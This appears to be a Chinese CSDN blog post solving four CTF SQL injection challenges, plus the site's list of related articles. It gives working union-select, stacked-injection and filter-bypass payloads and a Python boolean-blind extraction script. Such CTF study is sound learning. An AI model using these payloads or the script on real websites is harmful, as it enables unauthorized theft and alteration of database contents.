sql注入

最新推荐文章于 2024-08-06 10:06:17 发布
最新推荐文章于 2024-08-06 10:06:17 发布
阅读量1k 收藏 25
点赞数 21
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79880442/article/details/137874559
版权
文章详细描述了几场CTF比赛中关于SQL注入的挑战,包括利用ORDERBY和unionselect进行列数检测、数据提取,以及针对布尔盲注、空格过滤和堆叠注入的技巧。作者通过实际操作演示了解决这些安全问题的方法。
摘要由CSDN通过智能技术生成

1.[LitCTF 2023]这是什么?SQL !注一下 !

先输入个1看看回显

 可以看到闭合条件是)))))),而且不管是1'还是1''都报错,说明是数字型注入,

用1)))))) order by 2#,,1)))))) order by 3#查看有几列

//ORDER BY 语句用于根据指定的列对结果集进行排序。order by 2#对2列进行排序,如果有两列就会排序,order by 3#如果没有三列就会报错,这样就可以判断出有几列。

 

 说明有两列,查看表名:1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema =database()#

//union select是联合查询语句,可以在前面查询结束后继续执行union select后面的查询语句,如果你只想执行union select后面的查询语句,可以在1前面加一个-号,这样前面的查询就会错误,就只会返回union select 后面的查询结果。

group_concat函数可以合并多行的某列(或多列)数据为一行,默认以逗号分隔。功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

table_name:表名称

information_schema.tables数据库只读表,虚拟的,并不存在。在MySQL的5.1版本及以上,MySQL数据库中会存在一个叫做information_schema的默认数据库,这个库里面记录着MySQL管理的数据库的名称,表名,列名(也叫字段名)。

table_schema 在MySQL数据库中,table_schema指的是数据库的名称,当我们需要查询某个特定数据库中的表、视图、存储过程等对象时,需要指定table_schema。

database()MySQL自带的数据库。

查看users里面的列名:1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_name="users"#

column_name列名

 接着查列名里面的字段:1)))))) union select 1,group_concat(id,username,password) from users#

 

 很明显flag是假的,那么可能是flag不在该数据库,在其他的数据库,查询所有的数据库:

1)))))) union select 1,schema_name from information_schema.schemata#

 可以看到几个数据库,其中ctftraining比较可疑,可以先查询这个数据库:

1)))))) union select 1,table_name from information_schema.tables where table_schema='ctftraining'#

 可以看到有flag,进行读取:

1)))))) union select 1,flag from ctftraining.flag#

 2.[强网杯 2019]随便注

先提交1看看

 查询成功,接着尝试1'和1'',当为1'时报错,当为1''时不报错,说明是单引号闭合的。

用payloud:1' or 1=1#查询,结果显示出所有的东西,说明确实存在SQL注入。

 用order by语句查询列,当为1' order by 3#的时候报错,说明有两个列。

接着尝试用union select联合注入,但是发现被正则匹配了很多经常使用的SQL语句。

 尝试堆叠注入:1';show databases;#

 可以看见;后面的查询语句执行了,说明可以用堆叠注入。

构造payloud查看表名:1';show tables;#

 可以看到有一个纯数字的表名和words表,当查看的表名是纯数字的时候要用'把表名引起来。

1'; show columns from`1919810931114514`;#

 可以看到有flag,接着看看words表:1';show columns from words;#

 里面有id和data两个列,但是在1919810931114514表中只有flag一个字段,而且我们查询的时候是有两列的,也就是说该题的SQL语句查询的是words表下面的id和data两个列。我们就需要用到SQL堆叠注入可以执行修改语句这个特点来对数据库中的表进行修改,把1919810931114514表改成words表,并把flag列改成id列或data列,把原来的words表改成其他的名称。

构造payloud:1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

alter table命令用于添加、删除或者更改现有数据表中的列;

rename to重命名为;

 改完之后用1' or 1=1#爆出所有字段:

 得到flag。

3.[CISCN 2019华北Day2]Web1

当你输入1的时候并没有get传参id=1,那么可能是post传参,可以抓包看一下1是怎么上传的。

 

 可以看到是post传参。尝试2,3,1',1''

2:

 3:

 1'和1'':

 发现bool,可能是布尔盲注,接着测试,发现有空格时会发生报错,说明过滤了空格,

 也可以用bp去测试,把SQL常用的注入语句单词和字符都放在一个txt文本里,然后爆破就可以,会发现空格时和一些其他的长度会不一样

 那么就涉及到SQL注入中空格的绕过:

详细可看:https://blog.csdn.net/Cairo_A/article/details/134882367

这里就用括号绕过,构造payloud:

id=(select(ascii(mid(flag,1,1))=78)from(flag))

 因为题目是直接就给了我们flag在flag下面的,所以就可以直接查询

 

 回显和1的是一样的,说明正确,查看ASCII表第一个字母就是N,接着就可以一个字符一个字符的去测试,只用修改mid(flag,1,1)里面的第一个1,以及78就可以测试出所有,但是这样太过浪费时间。可以用python脚本跑一下:

import requests
import string

def blind_injection(url):
	flag = ''
	strings = string.printable
	for num in range(1,60):
		for i in strings:
			payload = '(select(ascii(mid(flag,{0},1))={1})from(flag))'.format(num,ord(i))
			post_data = {"id":payload}
			res = requests.post(url=url,data=post_data)
			if 'Hello' in res.text:
				flag += i
				print(flag)
			else:
				continue
	print(flag)


if __name__ == '__main__':
	url = 'http://node2.anna.nssctf.cn:28841/index.php'
	blind_injection(url)

实力不够,只能借鉴:来自https://blog.csdn.net/mochu7777777/article/details/109516952

 4.[SWPUCTF 2022 新生赛]ez_sql

看题目可以知道是post注入,而且参数是nss

nss=1时:

 很明显flag是假的,开始进行注入。

输入1’,结果报错

 构造payloud:nss=1' or 1=1#

 还是报错,说明可能把一些东西过滤了,测试一下

 可以看到过滤了空格,用/**/绕过

构造payloud:1'/**/union/**/select/**/1,2,3;#

 观察报错语句:1'没有了,union也没有了,都被过滤了,双写绕过union,用其他数字代替1

最终的payloud:4'/**/ununionion/**/select/**/1,2,3;#

 

 说明有三个列.

爆库名,构造payloud:4'/**/ununionion/**/select/**/1,2,database();#

 库名是NSS_db

爆表名:构造payloud:4'/**/ununionion/**/select/**/1,2,group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db';#

这里information多写一个的原因是过滤了or

 

 有两个表,爆表的列。构造payloud:4'/**/ununionion/**/select/**/1,2,group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb';#

 可以看到有三个列:id,secr3t,flll444g,查看secr3t,flll444g两个列的内容。

构造payloud:4'/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_tb;#

 flag是在secr3t这个列下面的。

这个题就是需要通过观看报错内容来确定哪里被过滤了,并且怎么去绕过。

[LitCTF 2023]这是什么?SQL一下
2301_80115024的博客
04-23 115
标红代码的指在users表中有名为‘username’和‘password’两个列,id值为用户输入参数。练习的最后一道布尔盲
【Web】SQL注入例题wp
uuzeray的博客
11-09 529
明天c语言月测了,再写博客就只能裸考了罢(悲)
LitCTF2023 WP
一个普普通通的博客
05-18 933
LitCTF2023是郑州轻工业大学首届网络安全赛,作为第一次举办的网络安全类型的校赛,它的难度极其容易,很加适合对CTF感兴趣但是没有基础的同学。
LitCTF2023
Naxi_rose的博客
05-17 525
题目很基础,有些题一言难尽。还是太菜了,做题做少了。多多刷题!!但是还有收获的,思路,xff的替代,sql 爆库 ,session伪造。
LitCTF2023 郑州轻工业大学首届网络安全赛 WP 部分
Aluxian_的博客
05-14 8308
由于刚接触CTF没多久 还是属于萌新级别的(中专高中生)也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。PS:记得所有的flag都改为NSSCTF或者LitCTF
SQL注入原理以及Spring Boot如何防止SQL注入(含详细示例代码)
12-29
SQL注入是一种严重的安全威胁,它允许攻击者通过在应用程序的输入字段中插入恶意SQL代码来执行未经授权的数据库操作。攻击者通常寻找没有适当验证和过滤的用户输入,然后利用这些漏洞来构造能改变原始SQL语句意图的...
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
sql注入讲解ppt.pptx
08-10
SQL 入基础知识点总结 SQL 入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL 入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
第一届LitCTF-2023web部分wp
kinakouni的博客
05-14 492
LitCTF2023。简单题一并拿下,难题一律不会www总的来说难度是低的,不亏是新生赛,对于我这个小白来说可太有体验感了以此表扬(xxxx。
ThinkPHP ‘information_schema.tables‘ 无效
ksws0263785的专栏
12-25 630
ThinkPHP在执行SQL时提示 'information_schema.tables' 无效。
使用information_schema查询mysql数据库是否存在表时,抛出异常‘information_schema’ doesn’t exist
m0_67578040的博客
01-02 1193
由于数据量比较大,需要分表并配置了读写分离,因此在该模块引入了shardingsphere。数据库:MySQL orm框架:mybatis由于是按照月份进行分表的,查询前会先判断该表是否存在。
[LitCTF 2023]这是什么?SQL一下 !] NSSCTF题解
最新发布
m0_62128855的博客
08-06 246
因为ctf库中,我们已知没有flag,所以我们在别的库中找flag。用到MySQL5.0以上的自带库information_schema。不管,就当作MySQL一下。MariaDB是什么数据库?ctftranining很可疑,我们从它开始。* 狠狠的SQL注入探姬老师的小题目。8.查看字段内容,出现flag。4.查看版本和当前数据库。提示这个是假的flag。只有一个flag字段。
mysql查看表存不存在
berry sky
08-20 4412
 mysql查看表存不存在
Web安全—information_schema数据库详解&基础补充
weixin_44431280的博客
04-04 1万+
Web安全—information_schema数据库 前言:在SQL注入中,information_schema数据库中包含的信息特别重要,通过这个表我们可以去获取到存在SQL注入网站的表,列,等信息,其危害不言而喻。 一:information_schema数据库 基础:information_schema是一个存放了当前数据库管理系统中所有数据库信息的一个数据库数据库只能进行读取,不支持修改(增,删,更新) mysql5.0以下:多用户单操作,不存在information_schema数据库 mys
解决thinkphp6读取sqlserver报Microsoft[SQL Server]对象名 ‘information_schema.tables‘ 无效错误
博客不一定要自己做
12-28 1846
需要修改thinkphp里面sqlserver数据库驱动,不要去改composer里面的东西。所以只能自己重写驱动,并且在database.php配置文件中,显示指定builder和type参数来完成非侵入式的修改。
mysql中information_schema.tables字段说明
热门推荐
YHJ
05-16 1万+
1. 获取所有表结构(TABLES) SELECT * FROM information_schema.TABLES WHERE TABLE_SCHEMA='数据库名'; TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。各字段说明如下: 字段 含义 Table_catalog 数据表登记目录 Table_schema 数据表所属的数据库名 Table_name 表名称 Tabl...
mysql表不存在_MySQL>表不存在。 但它确实(或它应该)
weixin_42122306的博客
01-18 3132
MySQL>表不存在。 但它确实(或它应该)我确实更改了MySQL安装的datadir,并按照一些步骤运行正常。 我所拥有的每个基地都正确地移动了一个。我可以连接和使用数据库,甚至SHOW TABLES正确返回所有表,并且mysql数据目录中存在每个表的文件。 但是当我尝试在那里选择某些东西时,它表示该表不存在。 但表确实存在,它甚至在SHOW TABLES声明中显示!我的猜测是,SHOW ...
SQL注入攻防深度解析
"SQL注入天书是一份详尽介绍SQL注入技术的资料,涵盖了从基础到高级的ASP入方法和技巧,适合不同水平的读者学习。" SQL注入是一种常见的网络安全漏洞,发生在Web应用程序未能充分验证和清理用户输入时。当用户...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值